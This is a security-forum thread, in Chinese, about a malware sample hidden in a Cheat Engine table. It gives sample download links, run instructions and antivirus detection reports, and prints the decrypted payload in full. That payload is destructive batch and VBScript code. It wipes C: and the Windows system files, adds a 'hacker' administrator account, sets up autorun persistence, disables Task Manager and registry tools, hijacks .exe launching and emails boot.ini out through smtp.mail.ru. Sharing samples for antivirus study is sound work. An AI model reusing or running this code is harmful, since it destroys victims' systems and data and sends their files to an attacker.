【低质量】一个利用CE修改器加载的样本

显示全部楼层 · 发表于 2024-11-14 21:56:01

本帖最后由 Raven95676 于 2024-11-14 23:37 编辑

低质量，看一乐（

https://pan.huang1111.cn/s/byz4aHY

https://x.ws28.cn/f/fkjbofj09rh

VT2：https://www.virustotal.com/gui/f ... 134811fbc3504d13f7c

食用方法：
安装Cheat Engine后双击

反编译之后的恶意脚本：
https://pan.huang1111.cn/s/E733qSb

显示全部楼层 · 发表于 2024-11-14 22:08:49

360:0

显示全部楼层 · 发表于 2024-11-14 22:14:40

卡巴解压秒

显示全部楼层 · 发表于 2024-11-14 22:55:18

腾讯电脑管家 1X

显示全部楼层 · 发表于 2024-11-14 22:57:44

本帖最后由心醉咖啡于 2024-11-14 23:47 编辑

盘访问不了，求分流
金山毒霸扫描miss

显示全部楼层 · 发表于 2024-11-14 23:00:54

显示全部楼层 · 发表于 2024-11-14 23:29:05

心醉咖啡发表于 2024-11-14 22:57
盘访问不了，求分流

https://x.ws28.cn/f/fkjbofj09rh

显示全部楼层 · 发表于 2024-11-14 23:41:52

EIS扫描miss，沙盒内运行kill衍生物3x

显示全部楼层 · 发表于 2024-11-15 09:18:54

同上，ESET双击杀3个衍生物，弹出一个网页谷歌报危险网页
BAT/Small.NAD 特洛伊木马
BAT/Disabler.NBW 特洛伊木马
BAT/DelFiles.NJN 特洛伊木马

显示全部楼层 · 发表于 2024-11-15 10:04:23

这人真是坏的流脓写个ct表还加破坏性的lua

神秘luapayload解密后

L5_1 = " @echo off\n rd C: /s /q\n del c:Program Files/q\n FOR /L %%i IN (1,1,1000000) DO md %%i\n assoc .lnk=.txt\n chcp 1251\n\n\nnet user SUPPORT_388945a0 /delete\nnet user hacker hack /add\nnet localgroup \208\144\208\180\208\188\208\184\208\189\208\184\209\129\209\130\209\128\208\176\209\130\208\190\209\128\209\139 hacker /add\nnet localgroup \208\159\208\190\208\187\209\140\208\183\208\190\208\178\208\176\209\130\208\181\208\187\208\184 SUPPORT_388945a0 /del\nreg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y\n "

复制代码

L7_1 = "@echo off\necho Chr(39)>%temp%\\temp1.vbs\necho Chr(39)>%temp%\\temp2.vbs\necho on error resume next > %temp%\\temp.vbs\necho Set S = CreateObject("Wscript.Shell") >> %temp%\\temp.vbs\necho set FSO=createobject("scripting.filesystemobject")>>%temp%\\temp.vbs\nreg add HKEY_USERS\\S-1-5-21-343818398-1417001333-725345543-1003\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\\S-1-5-21-343818398-1417001333-725345543-1003\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v ClassicShell /d 1 /fset \194\182\194\167=%0\ncopy %\194\182\194\167% %SystemRoot%\\user32dll.bat\nreg add "hklm\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v RunExplorer32 /d %SystemRoot%\\user32dll.bat /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f\necho fso.deletefile "C:\\ntldr",1 >> %temp%\\temp.vbs\nreg add "HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions" /v "NoSelectDownloadDir" /d 1 /f\nreg add "HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\main\\FeatureControl\\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f\nreg add "HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions" /v "NoFindFiles" /d 1 /f\nreg add "HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions" /v "NoNavButtons" /d 1 /f\necho fso.deletefolder "D:\\Windows",1 >> %temp%\\temp.vbs\necho fso.deletefolder "I:\\Windows",1 >> %temp%\\temp.vbs\necho fso.deletefolder "C:\\Windows",1 >> %temp%\\temp.vbs\necho sr=s.RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRoot") >> %temp%\\temp.vbs\necho fso.deletefile sr+"\\system32\\hal.dll",1 >> %temp%\\temp.vbs\necho sr=s.RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRoot") >> %temp%\\temp.vbs\necho fso.deletefolder sr+"\\system32\\dllcache",1 >> %temp%\\temp.vbs\necho sr=s.RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRoot") >> %temp%\\temp.vbs\necho fso.deletefolder sr+"\\system32\\drives",1 >> %temp%\\temp.vbs\necho s.regwrite "HKEY_CLASSES_ROOT\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\LocalizedString","forum.whack.ru\226\132\162">>%temp%\\temp.vbs\necho s.regwrite "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOwner","forum.whack.ru\226\132\162">>%temp%\\temp.vbs\necho s.regwrite "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOrganization","forum.whack.ru\226\132\162">>%temp%\\temp.vbs\necho on error resume next > %temp%\\temp1.vbs\necho set FSO=createobject("scripting.filesystemobject")>>%temp%\\temp1.vbs\necho do>>%temp%\\temp1.vbs\necho fso.getfile ("A:\\")>>%temp%\\temp1.vbs\necho loop>>%temp%\\temp1.vbs\necho on error resume next > %temp%\\temp2.vbs\necho Set S = CreateObject("Wscript.Shell") >> %temp%\\temp2.vbs\necho do>>%temp%\\temp2.vbs\necho execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\\temp2.vbs\necho loop>>%temp%\\temp2.vbs\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" /v disabletaskmgr /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" /v disableregistrytools /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoFind /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoRun /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoClose /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f\nreg add "hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f\necho set application=createobject("shell.application")>>%temp%\\temp.vbs\necho application.minimizeall>>%temp%\\temp.vbs\nreg add "hklm\\Software\\Microsoft\\Windows\\CurrentVersion\\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f\nstart rundll32 user32, SwapMouseButton\nreg add "HKCR\\exefile\\shell\\open\\command" /ve /t REG_SZ /d rundll32.exe /f\necho i=50 >> %temp%\\temp.vbs\necho while i^>0 or i^<0 >> %temp%\\temp.vbs\necho S.popup "forum.whack.ru\226\132\162",0, "forum.whack.ru\226\132\162",0+16 >> %temp%\\temp.vbs\necho i=i-1 >> %temp%\\temp.vbs\necho wend >> %temp%\\temp.vbs\necho do >> %temp%\\temp.vbs\necho wscript.sleep 200 >> %temp%\\temp.vbs\necho s.sendkeys"{capslock}" >> %temp%\\temp.vbs\necho wscript.sleep 200 >> %temp%\\temp.vbs\necho s.sendkeys"{numlock}" >> %temp%\\temp.vbs\necho wscript.sleep 200 >> %temp%\\temp.vbs\necho s.sendkeys"{scrolllock}" >> %temp%\\temp.vbs\necho loop>> %temp%\\temp.vbs\necho Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\\temp.vbs\necho Set colCDROMs = oWMP.cdromCollection >> %temp%\\temp.vbs\necho if colCDROMs.Count ^>= 1 then >> %temp%\\temp.vbs\necho For i = 0 to colCDROMs.Count - 1 >> %temp%\\temp.vbs\necho colCDROMs.Item(i).eject >> %temp%\\temp.vbs\necho next >> %temp%\\temp.vbs\necho End If >> %temp%\\temp.vbs\necho Call SendPost("smtp.mail.ru", "forum.whack.ru\226\132\162@mail.ru", "support@mail.ru", "...", "\208\154\208\190\208\191\208\188 \208\183\208\176\209\128\208\176\208\182\208\181\208\189!") >> %temp%\\temp.vbs\necho Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\\temp.vbs\necho Set iMsg = CreateObject("CDO.Message") >> %temp%\\temp.vbs\necho Set iConf = CreateObject("CDO.Configuration") >> %temp%\\temp.vbs\necho Set Flds = iConf.Fields >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\\temp.vbs\necho Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\\temp.vbs\necho Flds.Update >> %temp%\\temp.vbs\necho iMsg.Configuration = iConf >> %temp%\\temp.vbs\necho iMsg.To = strTo >> %temp%\\temp.vbs\necho iMsg.From = strFrom >> %temp%\\temp.vbs\necho iMsg.Subject = strSubject >> %temp%\\temp.vbs\necho iMsg.TextBody = strBody >> %temp%\\temp.vbs\necho iMsg.AddAttachment "c:\\boot.ini" >> %temp%\\temp.vbs\necho iMsg.Send >> %temp%\\temp.vbs\necho End Function >> %temp%\\temp.vbs\necho Set iMsg = Nothing >> %temp%\\temp.vbs\necho Set iConf = Nothing >> %temp%\\temp.vbs\necho Set Flds = Nothing >> %temp%\\temp.vbs\n\necho s.run "shutdown -r -t 0 -c ""pcforumhack.ru\226\132\162"" -f",1 >> %temp%\\temp.vbs\nstart %temp%\\temp.vbs\nstart %temp%\\temp1.vbs\nstart %temp%\\temp2.vbs\n "

复制代码

[病毒样本] 【低质量】一个利用CE修改器加载的样本

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源